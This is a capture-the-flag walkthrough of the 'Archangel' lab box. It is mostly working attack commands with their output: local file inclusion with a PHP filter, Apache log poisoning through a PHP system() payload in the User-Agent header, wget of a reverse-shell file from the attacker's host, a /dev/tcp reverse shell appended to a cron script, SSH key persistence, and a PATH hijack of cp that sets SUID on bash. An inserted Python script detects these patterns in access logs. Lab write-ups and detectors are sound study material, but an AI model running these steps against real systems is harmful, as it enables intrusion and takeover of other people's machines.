Archangel
Writeup.
Get a shell
1. Find a different hostname
mafialive.thm

2. Find flag 1
Add the domain name to /etc/hosts as: 10.10.224.98 mafialive.thm

3. Look for a page under development
test.php

4. Find flag 2
thm{explo1t1ng_lf1}

Looking at the URL, it's clear that we have to exploit LFI.
I tried reading /etc/passwd, but it seems we can only read a few files under the current directory. If we use a php filter and convert test.php into base64, we can read its source.

5. Get user shell & flag.
The hint said poison!!
Apache log poisoning it is!!!! (google search)
Log poisoning
I used the following curl command to poison the log:
└──$ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log" -H "User-Agent: <?php system(\$_GET['cmd']) ?>"
Log poisoning successful!!

Reverse shell
I used pentest monkey's revshell.
Start a python server on your local system & run the following command (make sure you change the IP & port):
└──$ curl "http://mafialive.thm/test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=wget+YOUR_IP:PORT/revshell.php"
So I copied the .php file onto the machine using wget,
& now when I visit
MACHINE_IP/revshell.php
I get a reverse shell.
Flag
┌──[~/stuff/thm/archangel] [10.8.102.180]
└──$ nc -nvlp 9001
Connection from 10.10.1.211:59838
Linux ubuntu 4.15.0-123-generic #126-Ubuntu SMP Wed Oct 21 09:40:11 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
15:03:46 up 1:03, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cat /home/archangel/user.txt
<REDACTED>
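The LFI and log-poisoning steps above leave a distinctive trail in the very access log that gets included. As an added example (not part of the original writeup), this Python script parses Apache combined-format log lines and flags stream wrappers or traversal in the view parameter, PHP tags in request headers, and the include-plus-cmd combination that marks the execution step. The parameter name view and the sample log lines are constructed assumptions, not data from the box.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)        # PHP open tag smuggled into a header
TRAVERSAL = re.compile(r'(^|[\\/])\.\.([\\/]|$)')          # any ../ or ..\ segment
WRAPPERS = ('php://', 'data:', 'expect://', 'file://')     # stream wrappers abused via LFI

# Constructed sample lines (not from the writeup), Apache combined log format.
SAMPLE_LOG = """\
10.0.0.5 - - [17/Sep/2023:15:01:02 +0000] "GET /test.php?view=/var/www/html/development_testing/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [17/Sep/2023:15:01:10 +0000] "GET /test.php?view=php://filter/convert.base64-encode/resource=/var/www/html/development_testing/test.php HTTP/1.1" 200 2048 "-" "curl/7.88.1"
10.0.0.9 - - [17/Sep/2023:15:02:30 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log HTTP/1.1" 200 9000 "-" "<?php system($_GET['cmd']) ?>"
10.0.0.9 - - [17/Sep/2023:15:03:01 +0000] "GET /test.php?view=/var/www/html/development_testing/.././.././../log/apache2/access.log&cmd=id HTTP/1.1" 200 9100 "-" "curl/7.88.1"
"""

def analyze_line(line, param='view'):
    """Classify one log line; returns None if it is not in combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    findings = []
    params = parse_qs(urlsplit(m['target']).query, keep_blank_values=True)
    for value in params.get(param, []):
        if value.lower().startswith(WRAPPERS):
            findings.append('lfi_wrapper')
        if TRAVERSAL.search(value):
            findings.append('path_traversal')
        if value.endswith('.log'):
            findings.append('log_file_include')
    # A PHP tag has no business in a User-Agent, Referer or request line.
    if any(PHP_TAG.search(s) for s in (m['ua'], m['referer'], unquote(m['target']))):
        findings.append('php_tag_in_request')
    # Including the log while also passing a cmd= parameter is the execution step.
    if 'cmd' in params and 'log_file_include' in findings:
        findings.append('poisoned_log_execution')
    return {'ip': m['ip'], 'ts': m['ts'], 'findings': findings}

def scan_log(text):
    alerts = []
    for line in text.splitlines():
        result = analyze_line(line)
        if result and result['findings']:
            alerts.append(result)
    return alerts

if __name__ == '__main__':
    for alert in scan_log(SAMPLE_LOG):
        print(alert['ts'], alert['ip'], ', '.join(alert['findings']))
```

On the sample, the benign first line produces nothing, while the other three are flagged in order as wrapper use, poisoning attempt, and poisoned-log execution.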
Root the machine
1. Get user 2 flag
There's a cronjob running a file in /opt (found through LinPEAS). We have full write access on it, so let's edit it & get a stable shell.
I am going to add my public key into the authorized keys of archangel.
get archangel shell
www-data@ubuntu:/opt$ echo "sh -i >& /dev/tcp/10.8.102.180/9099 0>&1" >> helloworld.sh
And we got the shell
└──$ nc -nvlp 9099
Connection from 10.10.1.211:41092
sh: 0: can't access tty; job control turned off
$ id
uid=1001(archangel) gid=1001(archangel) groups=1001(archangel)
Stabilize shell
└──$ cat ssh.sh
#!/bin/sh
# Install my public key for the current user (archangel) so I can ssh in
mkdir -p ~/.ssh
chmod 700 ~/.ssh
echo "ssh-rsa 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 heapbytes@pm.me" > ~/.ssh/authorized_keys
chmod 600 ~/.ssh/authorized_keys
Start a python server
└──$ python3 -m http.server 1111
Serving HTTP on 0.0.0.0 port 1111 (http://0.0.0.0:1111/) ...
10.10.1.211 - - [17/Sep/2023 15:33:56] "GET /ssh.sh HTTP/1.1" 200 -
Now the ssh part.


2. Root flag
Question hint: certain paths are dangerous.
Running the binary gives an error:
cp: cannot stat '/home/user/archangel/myfiles/*': No such file or directory
Taking note of the hint, my guess is that the binary calls cp via a relative path, so we can create our own cp & pwn the machine.
archangel@ubuntu:/tmp$ nano cp
archangel@ubuntu:/tmp$ cat cp
chmod +s /bin/bash
archangel@ubuntu:/tmp$ chmod 777 cp
I made it in /tmp; now let's add /tmp to our PATH variable.
archangel@ubuntu:/tmp$ export PATH=/tmp:$PATH
archangel@ubuntu:/tmp$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin
archangel@ubuntu:/tmp$
Root flag
archangel@ubuntu:/tmp$ cd
archangel@ubuntu:~$ cd secret/
archangel@ubuntu:~/secret$ ./backup
archangel@ubuntu:~/secret$ /bin/bash -p
bash-4.4# id
uid=1001(archangel) gid=1001(archangel) euid=0(root) egid=0(root) groups=0(root),1001(archangel)